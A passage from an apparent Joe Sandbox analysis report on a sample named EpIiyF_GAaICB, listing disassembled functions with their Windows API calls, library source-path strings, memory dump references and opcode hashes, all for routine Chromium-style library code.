                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$__location != nullptr$null pointer given to construct_at
                                                  • API String ID: 17069307-3901857445
                                                  • Opcode ID: 7f9a2042e7c093db3dc022cfc412bbfbeff6db2684ad6af932466fab2b0c2608
                                                  • Instruction ID: 39c5a6bfa66fd3b1374c87e3912a2ab12ffba70e12bdaaf6ed85879612b0bb31
                                                  • Opcode Fuzzy Hash: 7f9a2042e7c093db3dc022cfc412bbfbeff6db2684ad6af932466fab2b0c2608
                                                  • Instruction Fuzzy Hash: C851EF74A007018BDB24DF68D892F7ABBA1EF45712F184029ED569B391E771AA08C772
                                                  Function 00D43BD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00001100,?,00000000,?,?,?,00000000), ref: 00D43C76
                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00D43CD2
                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,00000000), ref: 00D43D6B
                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00D43D7E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastLibraryLoad
                                                  • String ID: ..\..\base\native_library_win.cc$LoadNativeLibraryHelper
                                                  • API String ID: 3568775529-3002026332
                                                  • Opcode ID: 1a8747c65d3b0da961109e6598a748827fc81d717bef29f174d20e58ca380872
                                                  • Instruction ID: beab7c78fb92f024d2ededb0f5fdb99a2f30e787d1467c055913466597485bd3
                                                  • Opcode Fuzzy Hash: 1a8747c65d3b0da961109e6598a748827fc81d717bef29f174d20e58ca380872
                                                  • Instruction Fuzzy Hash: 5F51B3719043409BD710AF28DC8576EBBA4EF95720F184A1DF8E597391EB70D944CBB2
                                                  Function 00D01404 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strlen.LIBCMT ref: 00D01510
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D01565
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                  • String ID: %*s:%s$%s%s %s$[%03u.%03u] $[printf format error]
                                                  • API String ID: 2172594012-3351823563
                                                  • Opcode ID: 0d80ecec0a0e2b7126c6cc975ddec751a996704d85216db0bb800a7adc30c7c7
                                                  • Instruction ID: db48f46525007a81ea804d7c767ceb61621511783856a973f716ae2bcec22622
                                                  • Opcode Fuzzy Hash: 0d80ecec0a0e2b7126c6cc975ddec751a996704d85216db0bb800a7adc30c7c7
                                                  • Instruction Fuzzy Hash: 10514BB6D00341AFEB10AF20CC46E6BB769EFC5720F04462CF95A561D1EB71D5188BB2
                                                  Function 00D24850 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,00000001), ref: 00D24878
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  Strings
                                                  • node shouldn't be null, xrefs: 00D24973
                                                  • __x != nullptr, xrefs: 00D24978
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__tree, xrefs: 00D24982
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D24987
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AcquireExclusiveLock
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__tree$__x != nullptr$node shouldn't be null
                                                  • API String ID: 4021432409-1565806511
                                                  • Opcode ID: 7022ec2425b0cc3f9ae079f87cfe5868bfbc491168999d2986e86fbc6efa7af4
                                                  • Instruction ID: cf899e12d59f68512a52e826e15b6fb82384c9b6d2509f87e834b432447e655a
                                                  • Opcode Fuzzy Hash: 7022ec2425b0cc3f9ae079f87cfe5868bfbc491168999d2986e86fbc6efa7af4
                                                  • Instruction Fuzzy Hash: 1E41B331B003658FCB24DF54E844AABBBA5AF95714F18816AE9569B341CB70EC45CFB0
                                                  Function 00D55A40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,00000000,?,00D54DDD,?,00000000,-00000100,?,00000000,-00000100,00000000,?,?,-00000100), ref: 00D55A50
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000000,00000002,?,?,00CEBF10,00000002,?,?), ref: 00D55B00
                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,00D54DDD,?,00000000,-00000100,?,00000000,-00000100,00000000,?,?,-00000100,?,00000000), ref: 00D55AD0
                                                    • Part of subcall function 00D3C4B0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,00000000,3BE85000,0000000A,DAFC8968,00D3F4F3,00D615E2), ref: 00D3C4CC
                                                    • Part of subcall function 00D3C4B0: AcquireSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D3C4FD
                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,00CEBF10,00000002,?,?), ref: 00D55B80
                                                  Strings
                                                  • bitset reset argument out of range, xrefs: 00D55B8C
                                                  • bitset set argument out of range, xrefs: 00D55ADC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: bitset reset argument out of range$bitset set argument out of range
                                                  • API String ID: 1678258262-3395121086
                                                  • Opcode ID: 52cdf5976049b7f953971c66571f2b63a79e8d5336b0abafabf21a7aec9c031a
                                                  • Instruction ID: 70b368cbba7a4998359a0c9ad77d38334c3f4f3a1dd23e2e2fa9a90ae4c7431b
                                                  • Opcode Fuzzy Hash: 52cdf5976049b7f953971c66571f2b63a79e8d5336b0abafabf21a7aec9c031a
                                                  • Instruction Fuzzy Hash: 4531E83261090897CF196A14E8A9ABD3706DBD6362F684319FD03D7699DBB0EC46C6B0
                                                  Function 00D3B820 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DC2E68), ref: 00D3B828
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DC2E68), ref: 00D3B872
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D3B8F6
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,00000001), ref: 00D3B962
                                                  • TlsSetValue.KERNEL32(00000001), ref: 00D3B970
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease$Value
                                                  • String ID: first
                                                  • API String ID: 3402380315-2456940119
                                                  • Opcode ID: ecb98ba55108c28817ff1767554f3d281bb5d6ab3dd1ea25fc584b15e1f7d6c3
                                                  • Instruction ID: d97273affa758c57ecf1d4a2d9581724b0ad997b3b1cae130e4dc193e8f89701
                                                  • Opcode Fuzzy Hash: ecb98ba55108c28817ff1767554f3d281bb5d6ab3dd1ea25fc584b15e1f7d6c3
                                                  • Instruction Fuzzy Hash: B7412231A00306CFDB248F65D849BB977B5EF44324F08443AEA899B7A1D3B5A845CF70
                                                  Function 00D46EB0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32 ref: 00D46F40
                                                  • GetLastError.KERNEL32 ref: 00D46F4D
                                                  • SetLastError.KERNEL32(00000000), ref: 00D46F86
                                                    • Part of subcall function 00D262C0: GetHandleVerifier.EPIIYF_GAAICB ref: 00D262C9
                                                  • MapViewOfFile.KERNEL32 ref: 00D46FCD
                                                  Strings
                                                  • MapImageToMemory, xrefs: 00D46EF8
                                                  • ..\..\base\files\memory_mapped_file_win.cc, xrefs: 00D46EF3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLast$CreateHandleMappingVerifierView
                                                  • String ID: ..\..\base\files\memory_mapped_file_win.cc$MapImageToMemory
                                                  • API String ID: 1014098455-1911252035
                                                  • Opcode ID: df30ee9124a4cd251a36ee0a6b5ace7e46df8fb9177fb62ac8ecc08595332093
                                                  • Instruction ID: c60d82437e585e71c8eb80be802bf29d5374e588d18a065336ac476f66dd0f4d
                                                  • Opcode Fuzzy Hash: df30ee9124a4cd251a36ee0a6b5ace7e46df8fb9177fb62ac8ecc08595332093
                                                  • Instruction Fuzzy Hash: A7419271A047419BC310AF28A84652AB7E1EFDA720F440B2DF5C697391EB71E909C7B2
                                                  Function 00D636A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 00D636D7
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D636DF
                                                  • _ValidateLocalCookies.LIBCMT ref: 00D63768
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D63793
                                                  • _ValidateLocalCookies.LIBCMT ref: 00D637E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 8e70a38502060f0587126771b96dd6ae3b1f0b27a8e8b2dd69a7cbd7063a215f
                                                  • Instruction ID: 457637460e7a53489be6a3487b1d18a588d557cf036a07fa15b8550cdc69b134
                                                  • Opcode Fuzzy Hash: 8e70a38502060f0587126771b96dd6ae3b1f0b27a8e8b2dd69a7cbd7063a215f
                                                  • Instruction Fuzzy Hash: 0E418FB4A00209EBCF10DF6CC885A9EBBB5FF45324F188155E8199B392D771AA15CBB1
                                                  Function 00D25AC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWow64Process.KERNEL32(00D25832,00000000), ref: 00D25B53
                                                  • __Init_thread_header.LIBCMT ref: 00D25BCC
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00D25832,00000000,?,?,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000001), ref: 00D25BE6
                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process2), ref: 00D25BF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleInit_thread_headerModuleProcProcessWow64
                                                  • String ID: IsWow64Process2$kernel32.dll
                                                  • API String ID: 3408976151-2577318745
                                                  • Opcode ID: f12f429956f5ba846497e9d012901b85c5d5e07829d95bec9ff138c2e9a9439c
                                                  • Instruction ID: dac66797910fc0f55716d4647f88f568a21fe56df9a0167bf157db4b3aa95db5
                                                  • Opcode Fuzzy Hash: f12f429956f5ba846497e9d012901b85c5d5e07829d95bec9ff138c2e9a9439c
                                                  • Instruction Fuzzy Hash: C3319C30A00A1A9FEB20CB55F845FBA77B5FB54318F144129E442CB294D7B9AD44CBB2
                                                  Function 00D291C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00D29230
                                                  • CreateFileW.KERNEL32(?,00D2959C,00000007,00000000,00000003,02000000,00000000,?,00000000), ref: 00D2925B
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00D29267
                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00D29284
                                                  Strings
                                                  • ..\..\base\files\file_util_win.cc, xrefs: 00D29208
                                                  • PathHasAccess, xrefs: 00D2920D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLast$AttributesCreate
                                                  • String ID: ..\..\base\files\file_util_win.cc$PathHasAccess
                                                  • API String ID: 1299224125-128198036
                                                  • Opcode ID: 7059bf26cf0679fd080cab088abccb6c925a6a0304b64bf0be455eb82117e3ee
                                                  • Instruction ID: 09ac13dbd1f7435a8c2fa69f02379c182fc75aafc02006d48a5f7b07919c0348
                                                  • Opcode Fuzzy Hash: 7059bf26cf0679fd080cab088abccb6c925a6a0304b64bf0be455eb82117e3ee
                                                  • Instruction Fuzzy Hash: 15213971A00350EBD3109B749C86B6EB364EFD5334F140729F992971C2EBA0980486B1
                                                  Function 00D7B5FE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,00D7B70D,?,00D72E9C,00000000,?,?,?,00D7B2EF,00000022,FlsSetValue,00DA0604,FlsSetValue,?), ref: 00D7B6BF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3664257935-537541572
                                                  • Opcode ID: 0f83fd6264557fbc138e712876b47ca95470b7a7b705c746008625ca6d04a90c
                                                  • Instruction ID: a5512d27557d468b2a542f2d12cba477958abe9b4d561de2bf3f832f29c88399
                                                  • Opcode Fuzzy Hash: 0f83fd6264557fbc138e712876b47ca95470b7a7b705c746008625ca6d04a90c
                                                  • Instruction Fuzzy Hash: FF21A872A01611EBC7219B259C55B6E3768EF51770B1A4212EE1AEB391F770ED00CAB0
                                                  Function 00D26EA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74synchronizationthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetThreadId.KERNEL32(000000CF,?,?,?,?,00000014,00000000,?,00D437C0,?,?,?,?,00D24669,?,?), ref: 00D26EBA
                                                  • GetLastError.KERNEL32 ref: 00D26ED0
                                                  • WaitForSingleObject.KERNEL32(000000CF,000000FF,?,00000000,?,?,?,?,?,?,?,?,?,?,00000014,00000000), ref: 00D26F45
                                                  • CloseHandle.KERNEL32(000000CF,?,?,?,?,?,?,?,?,?,?,00000014,00000000,?,00D437C0,?), ref: 00D26F50
                                                  Strings
                                                  • Join, xrefs: 00D26F28
                                                  • ..\..\base\threading\platform_thread_win.cc, xrefs: 00D26F23
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLastObjectSingleThreadWait
                                                  • String ID: ..\..\base\threading\platform_thread_win.cc$Join
                                                  • API String ID: 813778123-1746769387
                                                  • Opcode ID: ca47b178cab15296c26f90a9be0b688fa96e4d6dbe566c57caa87ce80937ed21
                                                  • Instruction ID: b1fc29f0122490c6e75a4290393f036dac21ec7d3bfe7eb6380bfad16298a0f6
                                                  • Opcode Fuzzy Hash: ca47b178cab15296c26f90a9be0b688fa96e4d6dbe566c57caa87ce80937ed21
